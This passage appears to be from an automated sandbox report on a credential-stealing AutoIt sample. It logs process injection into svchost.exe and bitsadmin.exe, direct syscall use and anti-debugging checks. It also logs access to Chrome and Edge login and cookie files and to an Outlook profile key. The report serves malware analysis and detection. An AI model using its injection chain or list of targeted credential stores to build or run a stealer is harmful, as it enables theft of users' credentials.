                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8E420 mov eax, dword ptr fs:[00000030h]3_2_02F8E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F8C427 mov eax, dword ptr fs:[00000030h]3_2_02F8C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FC8402 mov eax, dword ptr fs:[00000030h]3_2_02FC8402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FC8402 mov eax, dword ptr fs:[00000030h]3_2_02FC8402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FC8402 mov eax, dword ptr fs:[00000030h]3_2_02FC8402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCC5ED mov eax, dword ptr fs:[00000030h]3_2_02FCC5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FCC5ED mov eax, dword ptr fs:[00000030h]3_2_02FCC5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02F925E0 mov eax, dword ptr fs:[00000030h]3_2_02F925E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FBE5E7 mov eax, dword ptr fs:[00000030h]3_2_02FBE5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02FBE5E7 mov eax, dword ptr fs:[00000030h]3_2_02FBE5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBE5E7 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03016420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F965D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FCA5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FCE5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FB45B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0304A456 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FCE59C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0301C460 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FC4588 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F92582 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F92582 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FC656A mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0304A49A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F98550 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0301A4B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBE53E mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA0535 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03064B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FCAAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0300EB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F90AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FC4AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03058B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FE6ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03038B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03026B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03044B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03062B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0303EB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F98AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FE6AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FC8A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F9EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FCCA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA0A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F96A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03044BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FCCA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FB4A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0303EBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBEA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FCCA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0301CBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBEBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F98BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0301CA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FB0BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F90BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA0BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0303EA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0300CA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F8CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03064A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F88B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBEB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FCC8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0300E908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0301C912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0302892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0301892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FBE8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03064940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03010946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03034978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0301C97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F90887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F94859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FC0854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030189B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030189B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA2840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030269C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FCA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FB2835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FB2835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0305A9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0301E9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FC29F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0301C810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F9A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FC49D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0303483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02F909AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02FA29A0 mov eax, dword ptr fs:[00000030h] (11 occurrences)
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0042A124 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F51361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_02F54C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtCreateMutant: Direct from: 0x774635CC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtWriteVirtualMemory: Direct from: 0x77462E3C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtMapViewOfSection: Direct from: 0x77462D1C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtResumeThread: Direct from: 0x774636AC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtProtectVirtualMemory: Direct from: 0x77462F9C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtSetInformationProcess: Direct from: 0x77462C5C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtSetInformationThread: Direct from: 0x774563F9
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtProtectVirtualMemory: Direct from: 0x77457B2E
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtNotifyChangeKey: Direct from: 0x77463C2C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtAllocateVirtualMemory: Direct from: 0x77462BFC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtQueryInformationProcess: Direct from: 0x77462C26
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtResumeThread: Direct from: 0x77462FBC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtReadFile: Direct from: 0x77462ADC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtQuerySystemInformation: Direct from: 0x77462DFC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtDelayExecution: Direct from: 0x77462DDC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtAllocateVirtualMemory: Direct from: 0x77463C9C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtCreateUserProcess: Direct from: 0x7746371C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtWriteVirtualMemory: Direct from: 0x7746490C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtAllocateVirtualMemory: Direct from: 0x774648EC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtQuerySystemInformation: Direct from: 0x774648CC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtQueryVolumeInformationFile: Direct from: 0x77462F2C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtReadVirtualMemory: Direct from: 0x77462E8C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtCreateKey: Direct from: 0x77462C6C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtSetInformationThread: Direct from: 0x77462B4C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtQueryAttributesFile: Direct from: 0x77462E6C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtDeviceIoControlFile: Direct from: 0x77462AEC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtOpenSection: Direct from: 0x77462E0C
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtCreateFile: Direct from: 0x77462FEC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtOpenFile: Direct from: 0x77462DCC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtQueryInformationToken: Direct from: 0x77462CAC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtAllocateVirtualMemory: Direct from: 0x77462BEC
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | NtOpenKeyEx: Direct from: 0x77462B9C
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: NULL target: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe protection: read write
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: NULL target: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\bitsadmin.exe | Thread register set: target process: 2684
Source: C:\Windows\SysWOW64\bitsadmin.exe | Thread APC queued: target process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 273008
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004587B1 LogonUserW
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00464C53 mouse_event
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1SxKeB4u0c.exe"
Source: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe | Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
Source: C:\Windows\SysWOW64\bitsadmin.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: 1SxKeB4u0c.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 1SxKeB4u0c.exe, LbtMpScwNRqrVB.exe, 00000006.00000002.3896866146.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000000.1603973747.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750735039.00000000014D0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: LbtMpScwNRqrVB.exe, 00000006.00000002.3896866146.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000000.1603973747.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750735039.00000000014D0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: LbtMpScwNRqrVB.exe, 00000006.00000002.3896866146.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000000.1603973747.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750735039.00000000014D0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
Source: LbtMpScwNRqrVB.exe, 00000006.00000002.3896866146.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000000.1603973747.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750735039.00000000014D0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
                Source: 1SxKeB4u0c.exe, 00000000.00000003.1430895740.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1431048103.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000002.1454691196.0000000000B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe

                Stealing of Sensitive Information

Source: Yara match | File source: 3.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\bitsadmin.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: 1SxKeB4u0c.exe | Binary or memory string: WIN_81
Source: 1SxKeB4u0c.exe | Binary or memory string: WIN_XP
Source: 1SxKeB4u0c.exe | Binary or memory string: WIN_XPe
Source: 1SxKeB4u0c.exe | Binary or memory string: WIN_VISTA
Source: 1SxKeB4u0c.exe | Binary or memory string: WIN_7
Source: 1SxKeB4u0c.exe | Binary or memory string: WIN_8
